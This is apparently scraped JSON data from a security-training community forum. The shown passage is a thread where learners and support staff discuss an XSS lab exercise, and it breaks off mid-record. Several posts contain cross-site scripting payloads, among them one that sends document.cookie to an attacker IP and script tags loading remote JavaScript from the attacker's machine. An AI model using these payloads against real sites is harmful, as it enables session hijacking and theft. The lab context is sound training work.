III","color":"C69A70","icon":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstMTAtZkFjWTR6\"}"},"rankStyle":"FILLED"},"User:user:218":{"__typename":"User","id":"user:218","uid":218,"login":"CyberSharpe","biography":null,"registrationData":{"__typename":"RegistrationData","status":null,"registrationTime":"2024-09-24T12:21:41.969-07:00","confirmEmailStatus":null,"registrationAccessLevel":null,"ssoRegistrationFields":[]},"deleted":false,"email":"","avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/dS0yMTgtQXhlS2hk?image-coordinates=0%2C0%2C675%2C675"},"rank":{"__ref":"Rank:rank:10"},"messagesCount":43,"kudosGivenCount":28,"kudosReceivedCount":46,"kudosWeight":1,"ssoId":null,"followersCount":null,"solutionsCount":11,"entityType":"USER","eventPath":"community:dnvaw96485/user:218"},"ForumTopicMessage:message:2032":{"__typename":"ForumTopicMessage","uid":2032,"subject":"Pen Test CTFs: Jinja2 Exploitation","id":"message:2032","revisionNum":1,"repliesCount":8,"author":{"__ref":"User:user:218"},"depth":0,"hasGivenKudo":false,"board":{"__ref":"Forum:board:help"},"conversation":{"__ref":"Conversation:conversation:2032"},"moderationData":{"__ref":"ModerationData:moderation_data:2032"},"postTime":"2025-04-22T00:22:37.268-07:00","lastPublishTime":"2025-04-22T00:22:37.268-07:00","readOnly":false,"metrics":{"__typename":"MessageMetrics","views":86},"placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"entityType":"FORUM_TOPIC","eventPath":"category:help/community:dnvaw96485board:help/message:2032"},"Conversation:conversation:2032":{"__typename":"Conversation","id":"conversation:2032","solved":true,"topic":{"__ref":"ForumTopicMessage:message:2032"},"lastPostingActivityTime":"2025-04-29T11:19:52.936-07:00","lastPostTime":"2025-04-29T11:19:52.936-07:00"},"ModerationData:moderation_data:2032":{"__typename":"ModerationData","id":"moderation_data:2032","status":"APPROVED","rejectReason":null},"RelatedContentMessage:RelatedContentMessage:2032":{"__typename":"RelatedContentMessage","id":"RelatedContentMessage:2032","relatedMessage":{"__ref":"ForumTopicMessage:message:2032"}},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstOS1zNm9LWmk\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstOS1zNm9LWmk","height":160,"width":141,"mimeType":"image/png"},"Rank:rank:9":{"__typename":"Rank","id":"rank:9","position":19,"name":"Bronze II","color":"C69A70","icon":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstOS1zNm9LWmk\"}"},"rankStyle":"FILLED"},"User:user:1080":{"__typename":"User","id":"user:1080","uid":1080,"login":"bluejacket","biography":null,"registrationData":{"__typename":"RegistrationData","status":null,"registrationTime":"2025-02-21T09:05:10.129-08:00","confirmEmailStatus":null,"registrationAccessLevel":null,"ssoRegistrationFields":[]},"deleted":false,"email":"","avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/m_assets/avatars/default/avatar-11.svg?time=0"},"rank":{"__ref":"Rank:rank:9"},"messagesCount":3,"kudosGivenCount":1,"kudosReceivedCount":2,"kudosWeight":1,"ssoId":null,"followersCount":null,"solutionsCount":1,"entityType":"USER","eventPath":"community:dnvaw96485/user:1080"},"ForumTopicMessage:message:1647":{"__typename":"ForumTopicMessage","uid":1647,"subject":"Zeek Ep 4 Scripting","id":"message:1647","revisionNum":1,"repliesCount":3,"author":{"__ref":"User:user:1080"},"depth":0,"hasGivenKudo":false,"board":{"__ref":"Forum:board:help"},"conversation":{"__ref":"Conversation:conversation:1647"},"moderationData":{"__ref":"ModerationData:moderation_data:1647"},"postTime":"2025-02-21T09:15:33.005-08:00","lastPublishTime":"2025-02-21T09:15:33.005-08:00","readOnly":false,"metrics":{"__typename":"MessageMetrics","views":54},"placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"entityType":"FORUM_TOPIC","eventPath":"category:help/community:dnvaw96485board:help/message:1647"},"Conversation:conversation:1647":{"__typename":"Conversation","id":"conversation:1647","solved":true,"topic":{"__ref":"ForumTopicMessage:message:1647"},"lastPostingActivityTime":"2025-02-22T11:33:49.576-08:00","lastPostTime":"2025-02-22T11:33:49.576-08:00"},"ModerationData:moderation_data:1647":{"__typename":"ModerationData","id":"moderation_data:1647","status":"APPROVED","rejectReason":null},"RelatedContentMessage:RelatedContentMessage:1647":{"__typename":"RelatedContentMessage","id":"RelatedContentMessage:1647","relatedMessage":{"__ref":"ForumTopicMessage:message:1647"}},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstMTItWHVCRW1E\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstMTItWHVCRW1E","height":161,"width":141,"mimeType":"image/png"},"Rank:rank:12":{"__typename":"Rank","id":"rank:12","position":16,"name":"Silver II","color":"C4C4C4","icon":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstMTItWHVCRW1E\"}"},"rankStyle":"FILLED"},"User:user:545":{"__typename":"User","id":"user:545","uid":545,"login":"netcat","biography":null,"registrationData":{"__typename":"RegistrationData","status":null,"registrationTime":"2024-11-11T21:55:22.977-08:00","confirmEmailStatus":null,"registrationAccessLevel":null,"ssoRegistrationFields":[]},"deleted":false,"email":"","avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/dS01NDUtcGVEekpF?image-coordinates=0%2C0%2C484%2C484"},"rank":{"__ref":"Rank:rank:12"},"messagesCount":91,"kudosGivenCount":6,"kudosReceivedCount":83,"kudosWeight":1,"ssoId":null,"followersCount":null,"solutionsCount":12,"entityType":"USER","eventPath":"community:dnvaw96485/user:545"},"ForumTopicMessage:message:1338":{"__typename":"ForumTopicMessage","uid":1338,"subject":"Human Connection Challenge: Season 1 – Web Exploitation - XSS","id":"message:1338","revisionNum":1,"repliesCount":10,"author":{"__ref":"User:user:545"},"depth":0,"hasGivenKudo":false,"board":{"__ref":"Forum:board:help"},"conversation":{"__ref":"Conversation:conversation:1338"},"moderationData":{"__ref":"ModerationData:moderation_data:1338"},"postTime":"2025-01-07T07:41:20.742-08:00","lastPublishTime":"2025-01-07T07:41:20.742-08:00","readOnly":false,"metrics":{"__typename":"MessageMetrics","views":250},"placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"entityType":"FORUM_TOPIC","eventPath":"category:help/community:dnvaw96485board:help/message:1338"},"Conversation:conversation:1338":{"__typename":"Conversation","id":"conversation:1338","solved":true,"topic":{"__ref":"ForumTopicMessage:message:1338"},"lastPostingActivityTime":"2025-01-08T16:10:03.893-08:00","lastPostTime":"2025-01-08T16:10:03.893-08:00"},"ModerationData:moderation_data:1338":{"__typename":"ModerationData","id":"moderation_data:1338","status":"APPROVED","rejectReason":null},"RelatedContentMessage:RelatedContentMessage:1338":{"__typename":"RelatedContentMessage","id":"RelatedContentMessage:1338","relatedMessage":{"__ref":"ForumTopicMessage:message:1338"}},"User:user:517":{"__typename":"User","id":"user:517","uid":517,"login":"RobN","biography":null,"registrationData":{"__typename":"RegistrationData","status":null,"registrationTime":"2024-11-06T11:45:11.756-08:00","confirmEmailStatus":null,"registrationAccessLevel":null,"ssoRegistrationFields":[]},"deleted":false,"email":"","avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/m_assets/avatars/default/avatar-12.svg?time=0"},"rank":{"__ref":"Rank:rank:10"},"messagesCount":19,"kudosGivenCount":15,"kudosReceivedCount":16,"kudosWeight":1,"ssoId":null,"followersCount":null,"solutionsCount":2,"entityType":"USER","eventPath":"community:dnvaw96485/user:517"},"ForumTopicMessage:message:1458":{"__typename":"ForumTopicMessage","uid":1458,"subject":"python-scripting-for-malware-analysis-ep-5-code-obfuscation","id":"message:1458","revisionNum":1,"repliesCount":9,"author":{"__ref":"User:user:517"},"depth":0,"hasGivenKudo":false,"board":{"__ref":"Forum:board:help"},"conversation":{"__ref":"Conversation:conversation:1458"},"moderationData":{"__ref":"ModerationData:moderation_data:1458"},"postTime":"2025-01-26T03:48:13.999-08:00","lastPublishTime":"2025-01-26T03:48:13.999-08:00","readOnly":false,"metrics":{"__typename":"MessageMetrics","views":168},"placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"entityType":"FORUM_TOPIC","eventPath":"category:help/community:dnvaw96485board:help/message:1458"},"Conversation:conversation:1458":{"__typename":"Conversation","id":"conversation:1458","solved":true,"topic":{"__ref":"ForumTopicMessage:message:1458"},"lastPostingActivityTime":"2025-01-28T23:47:05.070-08:00","lastPostTime":"2025-01-28T23:47:05.070-08:00"},"ModerationData:moderation_data:1458":{"__typename":"ModerationData","id":"moderation_data:1458","status":"APPROVED","rejectReason":null},"RelatedContentMessage:RelatedContentMessage:1458":{"__typename":"RelatedContentMessage","id":"RelatedContentMessage:1458","relatedMessage":{"__ref":"ForumTopicMessage:message:1458"}},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstMjYtcGI5djVV\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstMjYtcGI5djVV","height":32,"width":32,"mimeType":"image/png"},"Rank:rank:26":{"__typename":"Rank","id":"rank:26","position":2,"name":"Community Support","color":"4563FF","icon":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstMjYtcGI5djVV\"}"},"rankStyle":"FILLED"},"User:user:24":{"__typename":"User","id":"user:24","uid":24,"login":"ChrisKershaw","biography":null,"registrationData":{"__typename":"RegistrationData","status":null,"registrationTime":"2024-05-30T07:54:11.369-07:00"},"deleted":false,"email":"","avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/dS0yNC1nR21GY0w?image-coordinates=0%2C77%2C240%2C317"},"rank":{"__ref":"Rank:rank:26"},"entityType":"USER","eventPath":"community:dnvaw96485/user:24"},"ModerationData:moderation_data:511":{"__typename":"ModerationData","id":"moderation_data:511","status":"APPROVED","rejectReason":null,"isReportedAbuse":false,"rejectUser":null,"rejectTime":null,"rejectActorType":null},"ForumReplyMessage:message:511":{"__typename":"ForumReplyMessage","author":{"__ref":"User:user:24"},"id":"message:511","revisionNum":1,"uid":511,"depth":1,"hasGivenKudo":false,"subscribed":false,"board":{"__ref":"Forum:board:help"},"parent":{"__ref":"ForumTopicMessage:message:506"},"conversation":{"__ref":"Conversation:conversation:506"},"subject":"Re: Cross-Site Scripting: Ep.6 – Further Exploitation","moderationData":{"__ref":"ModerationData:moderation_data:511"},"body":"

Hey shubham

Thank you for posting, and welcome to the Human Connection! I'm Chris, I work in the Customer Support Team, and I'll be happy to help you with your attempt 😊. 

I'll be happy to share a hint to help you with your lab attempt:

In the Ask a Question page, add the following to the Message field: <script src=\"http://$KALI_IP/script.js\" ></script>

Will you see if this helps you with your attempt? 


","body@stripHtml({\"removeProcessingText\":false,\"removeSpoilerMarkup\":false,\"removeTocMarkup\":false,\"truncateLength\":200})@stringLength":"208","kudosSumWeight":1,"repliesCount":0,"postTime":"2024-09-20T06:03:12.640-07:00","lastPublishTime":"2024-09-20T06:03:12.640-07:00","metrics":{"__typename":"MessageMetrics","views":504},"visibilityScope":"PUBLIC","placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"solution":false,"entityType":"FORUM_REPLY","eventPath":"category:help/community:dnvaw96485board:help/message:506/message:511","replies":{"__typename":"MessageConnection","pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null},"edges":[]},"customFields":[],"attachments":{"__typename":"AttachmentConnection","edges":[],"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}}},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstMS15alk5UjU\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstMS15alk5UjU","height":32,"width":32,"mimeType":"image/png"},"Rank:rank:1":{"__typename":"Rank","id":"rank:1","position":0,"name":"Community Manager","color":"4563FF","icon":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstMS15alk5UjU\"}"},"rankStyle":"FILLED"},"User:user:5":{"__typename":"User","id":"user:5","uid":5,"login":"KieranRowley","biography":null,"registrationData":{"__typename":"RegistrationData","status":null,"registrationTime":"2024-05-24T06:50:29.451-07:00"},"deleted":false,"email":"","avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/dS01LWhuekFHMw?image-coordinates=0%2C0%2C656%2C656"},"rank":{"__ref":"Rank:rank:1"},"entityType":"USER","eventPath":"community:dnvaw96485/user:5"},"ModerationData:moderation_data:507":{"__typename":"ModerationData","id":"moderation_data:507","status":"APPROVED","rejectReason":null,"isReportedAbuse":false,"rejectUser":null,"rejectTime":null,"rejectActorType":null},"ForumReplyMessage:message:507":{"__typename":"ForumReplyMessage","uid":507,"id":"message:507","revisionNum":1,"author":{"__ref":"User:user:5"},"readOnly":false,"repliesCount":2,"depth":1,"hasGivenKudo":false,"subscribed":false,"board":{"__ref":"Forum:board:help"},"parent":{"__ref":"ForumTopicMessage:message:506"},"conversation":{"__ref":"Conversation:conversation:506"},"subject":"Re: Cross-Site Scripting: Ep.6 – Further Exploitation","moderationData":{"__ref":"ModerationData:moderation_data:507"},"body":"

Hi shubham welcome to The Human Connection!

\n

Please can you provide some detail of the steps you have already taken so that your fellow community members are able to assist you?

","body@stripHtml({\"removeProcessingText\":false,\"removeSpoilerMarkup\":false,\"removeTocMarkup\":false,\"truncateLength\":200})@stringLength":"180","kudosSumWeight":0,"postTime":"2024-09-20T01:34:47.645-07:00","lastPublishTime":"2024-09-20T01:34:47.645-07:00","metrics":{"__typename":"MessageMetrics","views":508},"visibilityScope":"PUBLIC","placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"solution":false,"entityType":"FORUM_REPLY","eventPath":"category:help/community:dnvaw96485board:help/message:506/message:507","replies":{"__typename":"MessageConnection","pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null},"edges":[{"__typename":"MessageEdge","cursor":"MjUuM3wyLjF8b3wzfDE0OjAsMzk6MXwx","node":{"__ref":"ForumReplyMessage:message:508"}}]},"customFields":[],"attachments":{"__typename":"AttachmentConnection","edges":[],"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}}},"ModerationData:moderation_data:508":{"__typename":"ModerationData","id":"moderation_data:508","status":"APPROVED","rejectReason":null,"isReportedAbuse":false,"rejectUser":null,"rejectTime":null,"rejectActorType":"member"},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstMjUteWJYNnRZ\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstMjUteWJYNnRZ","height":32,"width":32,"mimeType":"image/png"},"Rank:rank:25":{"__typename":"Rank","id":"rank:25","position":3,"name":"Immerser","color":"4563FF","icon":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstMjUteWJYNnRZ\"}"},"rankStyle":"FILLED"},"User:user:15":{"__typename":"User","id":"user:15","uid":15,"login":"NyePrior","biography":null,"registrationData":{"__typename":"RegistrationData","status":null,"registrationTime":"2024-05-30T01:39:34.374-07:00"},"deleted":false,"email":"","avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/dS0xNS1qUUhMazA?image-coordinates=0%2C0%2C512%2C512"},"rank":{"__ref":"Rank:rank:25"},"entityType":"USER","eventPath":"community:dnvaw96485/user:15"},"ForumReplyMessage:message:508":{"__typename":"ForumReplyMessage","uid":508,"id":"message:508","revisionNum":1,"author":{"__ref":"User:user:182"},"readOnly":false,"repliesCount":1,"depth":2,"hasGivenKudo":false,"subscribed":false,"board":{"__ref":"Forum:board:help"},"parent":{"__ref":"ForumReplyMessage:message:507"},"conversation":{"__ref":"Conversation:conversation:506"},"subject":"Re: Cross-Site Scripting: Ep.6 – Further Exploitation","moderationData":{"__ref":"ModerationData:moderation_data:508"},"body":"

Thanks for welcome.

So I tire using netcat with the payload in message to make a reverse connection

Payload:<img src=xss onload=\"this.src='http://10.102.181.168:5556/admin/token?'+document.cookie;this.removeAttribute('onerror');\"/>

","body@stripHtml({\"removeProcessingText\":false,\"removeSpoilerMarkup\":false,\"removeTocMarkup\":false,\"truncateLength\":200})@stringLength":"206","kudosSumWeight":2,"postTime":"2024-09-20T01:56:15.363-07:00","lastPublishTime":"2024-09-20T01:56:15.363-07:00","metrics":{"__typename":"MessageMetrics","views":489},"visibilityScope":"PUBLIC","placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"solution":false,"entityType":"FORUM_REPLY","eventPath":"category:help/community:dnvaw96485board:help/message:506/message:508","replies":{"__typename":"MessageConnection","pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null},"edges":[{"__typename":"MessageEdge","cursor":"MjUuM3wyLjF8b3wxfDE0OjAsMzk6MXwx","node":{"__ref":"ForumReplyMessage:message:545"}}]},"customFields":[],"attachments":{"__typename":"AttachmentConnection","edges":[],"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}}},"ModerationData:moderation_data:545":{"__typename":"ModerationData","id":"moderation_data:545","status":"APPROVED","rejectReason":null,"isReportedAbuse":false,"rejectUser":null,"rejectTime":null,"rejectActorType":"member"},"ForumReplyMessage:message:545":{"__typename":"ForumReplyMessage","author":{"__ref":"User:user:15"},"id":"message:545","revisionNum":1,"uid":545,"depth":3,"hasGivenKudo":false,"subscribed":false,"board":{"__ref":"Forum:board:help"},"parent":{"__ref":"ForumReplyMessage:message:508"},"conversation":{"__ref":"Conversation:conversation:506"},"subject":"Re: Cross-Site Scripting: Ep.6 – Further Exploitation","moderationData":{"__ref":"ModerationData:moderation_data:545"},"body":"

Hi shubham 👋 have another look at the \"XSS and SSRF\" section of the Briefing panel. You'll need to use a different payload than this.

","body@stripHtml({\"removeProcessingText\":false,\"removeSpoilerMarkup\":false,\"removeTocMarkup\":false,\"truncateLength\":200})@stringLength":"136","kudosSumWeight":0,"repliesCount":0,"postTime":"2024-09-24T04:50:16.619-07:00","lastPublishTime":"2024-09-24T04:50:16.619-07:00","metrics":{"__typename":"MessageMetrics","views":373},"visibilityScope":"PUBLIC","placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"solution":false,"entityType":"FORUM_REPLY","eventPath":"category:help/community:dnvaw96485board:help/message:506/message:545","customFields":[],"attachments":{"__typename":"AttachmentConnection","edges":[],"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}}},"ModerationData:moderation_data:523":{"__typename":"ModerationData","id":"moderation_data:523","status":"APPROVED","rejectReason":null,"isReportedAbuse":false,"rejectUser":null,"rejectTime":null,"rejectActorType":null},"ForumReplyMessage:message:523":{"__typename":"ForumReplyMessage","author":{"__ref":"User:user:5"},"id":"message:523","revisionNum":2,"uid":523,"depth":1,"hasGivenKudo":false,"subscribed":false,"board":{"__ref":"Forum:board:help"},"parent":{"__ref":"ForumTopicMessage:message:506"},"conversation":{"__ref":"Conversation:conversation:506"},"subject":"Re: Cross-Site Scripting: Ep.6 – Further Exploitation","moderationData":{"__ref":"ModerationData:moderation_data:523"},"body":"

Hi shubham did the information above help?

\n

If so, please don't forget to mark it as a Solution ✅

\n

Marking a reply as a solution helps other community members to find answers to questions that they may also have. It also confirms to your fellow community members that their reply was helpful! You can accept more than one reply as a solution.

","body@stripHtml({\"removeProcessingText\":false,\"removeSpoilerMarkup\":false,\"removeTocMarkup\":false,\"truncateLength\":200})@stringLength":"203","kudosSumWeight":0,"repliesCount":0,"postTime":"2024-09-21T08:10:05.427-07:00","lastPublishTime":"2024-09-21T08:10:18.516-07:00","metrics":{"__typename":"MessageMetrics","views":407},"visibilityScope":"PUBLIC","placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"solution":false,"entityType":"FORUM_REPLY","eventPath":"category:help/community:dnvaw96485board:help/message:506/message:523","replies":{"__typename":"MessageConnection","pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null},"edges":[]},"customFields":[],"attachments":{"__typename":"AttachmentConnection","edges":[],"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}}},"User:user:206":{"__typename":"User","id":"user:206","uid":206,"login":"me5382","biography":null,"registrationData":{"__typename":"RegistrationData","status":null,"registrationTime":"2024-09-23T08:08:29.428-07:00"},"deleted":false,"email":"","avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/m_assets/avatars/default/avatar-4.svg?time=0"},"rank":{"__ref":"Rank:rank:8"},"entityType":"USER","eventPath":"community:dnvaw96485/user:206"},"ModerationData:moderation_data:539":{"__typename":"ModerationData","id":"moderation_data:539","status":"APPROVED","rejectReason":null,"isReportedAbuse":false,"rejectUser":null,"rejectTime":null,"rejectActorType":"member"},"ForumReplyMessage:message:539":{"__typename":"ForumReplyMessage","uid":539,"id":"message:539","revisionNum":1,"author":{"__ref":"User:user:206"},"readOnly":false,"repliesCount":1,"depth":1,"hasGivenKudo":false,"subscribed":false,"board":{"__ref":"Forum:board:help"},"parent":{"__ref":"ForumTopicMessage:message:506"},"conversation":{"__ref":"Conversation:conversation:506"},"subject":"Re: Cross-Site Scripting: Ep.6 – Further Exploitation","moderationData":{"__ref":"ModerationData:moderation_data:539"},"body":"

I am also having problems on this lesson. So far I haven't been able to get the site to execute any new code

I tried running the hint from below as well as the following:

<script src=\"http://0.0.0.0:8080/script.js\"></script>

My console just converts it to a string and does not actually call into the <script>. (notice how the question field is a string).

I am sure I must be misunderstanding something, any help would be appreciated. 



","body@stripHtml({\"removeProcessingText\":false,\"removeSpoilerMarkup\":false,\"removeTocMarkup\":false,\"truncateLength\":200})@stringLength":"206","kudosSumWeight":0,"postTime":"2024-09-23T08:14:54.446-07:00","lastPublishTime":"2024-09-23T08:14:54.446-07:00","metrics":{"__typename":"MessageMetrics","views":168},"visibilityScope":"PUBLIC","placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"solution":false,"entityType":"FORUM_REPLY","eventPath":"category:help/community:dnvaw96485board:help/message:506/message:539","replies":{"__typename":"MessageConnection","pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null},"edges":[{"__typename":"MessageEdge","cursor":"MjUuM3wyLjF8b3wzfDE0OjAsMzk6MXwx","node":{"__ref":"ForumReplyMessage:message:540"}}]},"customFields":[],"attachments":{"__typename":"AttachmentConnection","edges":[],"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}}},"ModerationData:moderation_data:540":{"__typename":"ModerationData","id":"moderation_data:540","status":"APPROVED","rejectReason":null,"isReportedAbuse":false,"rejectUser":null,"rejectTime":null,"rejectActorType":null},"ForumReplyMessage:message:540":{"__typename":"ForumReplyMessage","author":{"__ref":"User:user:5"},"id":"message:540","revisionNum":1,"uid":540,"depth":2,"hasGivenKudo":false,"subscribed":false,"board":{"__ref":"Forum:board:help"},"parent":{"__ref":"ForumReplyMessage:message:539"},"conversation":{"__ref":"Conversation:conversation:506"},"subject":"Re: Cross-Site Scripting: Ep.6 – Further Exploitation","moderationData":{"__ref":"ModerationData:moderation_data:540"},"body":"

shubham I wondered if you had any hints for me5382 

","body@stripHtml({\"removeProcessingText\":false,\"removeSpoilerMarkup\":false,\"removeTocMarkup\":false,\"truncateLength\":200})@stringLength":"58","kudosSumWeight":0,"repliesCount":0,"postTime":"2024-09-23T08:30:23.040-07:00","lastPublishTime":"2024-09-23T08:30:23.040-07:00","metrics":{"__typename":"MessageMetrics","views":340},"visibilityScope":"PUBLIC","placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"solution":false,"entityType":"FORUM_REPLY","eventPath":"category:help/community:dnvaw96485board:help/message:506/message:540","replies":{"__typename":"MessageConnection","pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null},"edges":[]},"customFields":[],"attachments":{"__typename":"AttachmentConnection","edges":[],"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}}},"User:user:209":{"__typename":"User","id":"user:209","uid":209,"login":"natelott","biography":null,"registrationData":{"__typename":"RegistrationData","status":null,"registrationTime":"2024-09-23T23:41:00.865-07:00"},"deleted":false,"email":"","avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/m_assets/avatars/default/avatar-4.svg?time=0"},"rank":{"__ref":"Rank:rank:8"},"entityType":"USER","eventPath":"community:dnvaw96485/user:209"},"ModerationData:moderation_data:542":{"__typename":"ModerationData","id":"moderation_data:542","status":"APPROVED","rejectReason":null,"isReportedAbuse":false,"rejectUser":null,"rejectTime":null,"rejectActorType":"member"},"ForumReplyMessage:message:542":{"__typename":"ForumReplyMessage","author":{"__ref":"User:user:209"},"id":"message:542","revisionNum":1,"uid":542,"depth":1,"hasGivenKudo":false,"subscribed":false,"board":{"__ref":"Forum:board:help"},"parent":{"__ref":"ForumTopicMessage:message:506"},"conversation":{"__ref":"Conversation:conversation:506"},"subject":"Re: Cross-Site Scripting: Ep.6 – Further Exploitation","moderationData":{"__ref":"ModerationData:moderation_data:542"},"body":"

Having the same issues.  Script is running, but /admin/token immediately redirects back to /dashboard.  Executed JS code in console and it returns html from /dashboard.  

Created script.js on VM.  Running netcat instance on port 8080 to handle HTTP request.   I can see the request occur in terminal.   Token not returned.  

Command being used in message field:  <script src=\"http://0.0.0.0:8080/script.js\"></script>

","body@stripHtml({\"removeProcessingText\":false,\"removeSpoilerMarkup\":false,\"removeTocMarkup\":false,\"truncateLength\":200})@stringLength":"228","kudosSumWeight":0,"repliesCount":0,"postTime":"2024-09-23T23:50:29.731-07:00","lastPublishTime":"2024-09-23T23:50:29.731-07:00","metrics":{"__typename":"MessageMetrics","views":301},"visibilityScope":"PUBLIC","placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"solution":false,"entityType":"FORUM_REPLY","eventPath":"category:help/community:dnvaw96485board:help/message:506/message:542","replies":{"__typename":"MessageConnection","pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null},"edges":[]},"customFields":[],"attachments":{"__typename":"AttachmentConnection","edges":[],"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}}},"ModerationData:moderation_data:544":{"__typename":"ModerationData","id":"moderation_data:544","status":"APPROVED","rejectReason":null,"isReportedAbuse":false,"rejectUser":null,"rejectTime":null,"rejectActorType":"member"},"ForumReplyMessage:message:544":{"__typename":"ForumReplyMessage","uid":544,"id":"message:544","revisionNum":1,"author":{"__ref":"User:user:15"},"readOnly":false,"repliesCount":1,"depth":1,"hasGivenKudo":false,"subscribed":false,"board":{"__ref":"Forum:board:help"},"parent":{"__ref":"ForumTopicMessage:message:506"},"conversation":{"__ref":"Conversation:conversation:506"},"subject":"Re: Cross-Site Scripting: Ep.6 – Further Exploitation","moderationData":{"__ref":"ModerationData:moderation_data:544"},"body":"

Hi me5382 natelott 👋

\n

In both of your payloads, you're using 0.0.0.0 as the IP address. This would work if the Wildcard Cycles application was running locally on the Kali Desktop. However, as this is running on a different host, you'll need to specify the Kali IP address, not 0.0.0.0.

","body@stripHtml({\"removeProcessingText\":false,\"removeSpoilerMarkup\":false,\"removeTocMarkup\":false,\"truncateLength\":200})@stringLength":"203","kudosSumWeight":0,"postTime":"2024-09-24T04:49:52.455-07:00","lastPublishTime":"2024-09-24T04:49:52.455-07:00","metrics":{"__typename":"MessageMetrics","views":317},"visibilityScope":"PUBLIC","placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"solution":false,"entityType":"FORUM_REPLY","eventPath":"category:help/community:dnvaw96485board:help/message:506/message:544","replies":{"__typename":"MessageConnection","pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null},"edges":[{"__typename":"MessageEdge","cursor":"MjUuM3wyLjF8b3wzfDE0OjAsMzk6MXwx","node":{"__ref":"ForumReplyMessage:message:546"}}]},"customFields":[],"attachments":{"__typename":"AttachmentConnection","edges":[],"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}}},"ModerationData:moderation_data:546":{"__typename":"ModerationData","id":"moderation_data:546","status":"APPROVED","rejectReason":null,"isReportedAbuse":false,"rejectUser":null,"rejectTime":null,"rejectActorType":"member"},"ForumReplyMessage:message:546":{"__typename":"ForumReplyMessage","author":{"__ref":"User:user:209"},"id":"message:546","revisionNum":2,"uid":546,"depth":2,"hasGivenKudo":false,"subscribed":false,"board":{"__ref":"Forum:board:help"},"parent":{"__ref":"ForumReplyMessage:message:544"},"conversation":{"__ref":"Conversation:conversation:506"},"subject":"Re: Cross-Site Scripting: Ep.6 – Further 